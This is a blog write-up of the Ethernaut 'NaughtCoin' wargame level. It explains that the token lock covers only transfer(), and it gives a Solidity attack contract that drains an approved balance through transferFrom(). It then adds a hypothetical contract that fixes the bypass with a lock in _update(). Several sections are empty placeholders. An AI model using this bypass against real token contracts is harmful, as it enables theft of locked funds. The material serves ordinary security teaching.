# Smart Contract Hacking Ethernaut: 15. NaughtCoin

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-28
**URL:** https://paragraph.com/@leekdev/ethernaut-15-naughtcoin

## Content

Ethernaut is a wargame developed by OpenZeppelin and built on the Solidity programming language. Each level contains a smart contract that needs to be hacked.

### Tutorials

- GitHub - attack code
- Bilibili - video tutorial
- YouTube - video tutorial
- TikTok - ….

### Challenge

The player holds a balance in the ERC20 contract, but it is locked. The goal is to move the balance out ahead of time.

### Hack approach

Only the `transfer` method is locked. The `approve` mechanism is still available and can also be used to move the tokens out.

First manually `approve` the attack contract for a sufficient amount, then call the attack function.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";

contract NaughtCoinHack {
    // The ERC20 token whose transfer() is locked
    IERC20 public exploitInst;

    constructor(address _target) {
        exploitInst = IERC20(_target);
    }

    // The caller must have approved this contract for its full balance first.
    // transferFrom() is not covered by the lock, so the whole balance moves.
    function attack() external payable {
        exploitInst.transferFrom(msg.sender, address(this), exploitInst.balanceOf(msg.sender));
    }
}
```

### Hack cases

…

### Mitigation

…

### References

….
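The approach above works because the lock sits on `transfer` alone while `transferFrom` reaches the same balance. The following is an added example, not code from the original post or from the Ethernaut level: a hypothetical `TimeLockedCoin` that enforces the lock on every transfer path. It assumes OpenZeppelin Contracts v5, where all balance changes pass through the internal `_update` hook; the contract name, token name, supply and error are constructed for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import { ERC20 } from "@openzeppelin/contracts/token/ERC20/ERC20.sol";

/// Added example (hypothetical contract, not the Ethernaut level's code).
/// Assumes OpenZeppelin Contracts v5: transfer(), transferFrom(), mint and
/// burn all go through the internal _update() hook.
contract TimeLockedCoin is ERC20 {
    address public lockedHolder; // account whose balance is locked
    uint256 public unlockTime;   // timestamp after which the balance may move

    error TokensLocked(address holder, uint256 until);

    constructor(address holder, uint256 lockSeconds) ERC20("TimeLockedCoin", "TLC") {
        lockedHolder = holder;
        unlockTime = block.timestamp + lockSeconds;
        // Minting has from == address(0), so the lock check below lets it through.
        _mint(holder, 1_000_000 * 10 ** decimals());
    }

    // Check the token owner (`from`), not msg.sender, and do it in the single
    // function every balance change passes through. A modifier on transfer()
    // alone leaves transferFrom() open: any spender the holder has approved
    // can still move the locked balance.
    function _update(address from, address to, uint256 value) internal override {
        if (from == lockedHolder && block.timestamp < unlockTime) {
            revert TokensLocked(from, unlockTime);
        }
        super._update(from, to, value);
    }
}
```

With this hook in place, `approve` still succeeds during the lock period, but the subsequent `transferFrom` reverts with `TokensLocked` because the debited account is the locked holder.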